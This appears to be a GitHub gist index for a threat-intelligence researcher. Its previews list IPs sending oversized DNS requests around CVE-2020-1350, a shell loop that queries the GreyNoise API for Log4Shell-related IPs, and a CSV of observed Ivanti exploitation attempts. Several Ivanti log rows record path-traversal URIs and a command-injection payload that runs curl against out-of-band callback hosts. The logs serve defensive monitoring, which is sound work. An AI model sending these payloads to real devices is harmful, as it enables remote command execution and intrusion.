Andrew Morris andrew-morris

@andrew-morris
andrew-morris / big_dns_requests.md
Created July 15, 2020 18:59
big dns requests

I'm doing a bit of cursory research into GreyNoise data WRT CVE-2020-1350.

The following IPs have blasted the Internet with large DNS requests (>1000 bytes) in the past 24 hours:

(sorted by packet count)

  16 89.196.51.73
  13 5.209.199.204
  12 62.102.143.106
  10 188.212.245.149
@andrew-morris
andrew-morris / 7aac1a57-4f05-48db-8d55-950674d3eefc.csv
Created October 13, 2021 14:13
IPs scanning or attacking hosts in exclusively Israel
Columns: ip, classification, first_seen, last_seen
curl -s https://gist.githubusercontent.com/gnremy/c546c7911d5f876f263309d7161a7217/raw/170f7d6cf92172443ecc68db0b6cbd4d8226a398/CVE-2021-44228_IPs.csv | cut -d, -f1 | while read -r ip; do curl -s "https://api.greynoise.io/v3/community/$ip"; done | jq -s .
@andrew-morris
andrew-morris / ivanti.csv
Last active February 8, 2024 09:55
IPs that are scanning for, or exploiting, vulnerable Ivanti devices (a la GreyNoise) - Updated Feb 01 2024
Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../

Keybase proof

I hereby claim:

  • I am andrew-morris on github.
  • I am morris (https://keybase.io/morris) on keybase.
  • I have a public key whose fingerprint is 1F50 1325 8595 EC49 9A71 8AD1 C0B9 E4CA 97CE 2C60

To claim this, I am signing this object: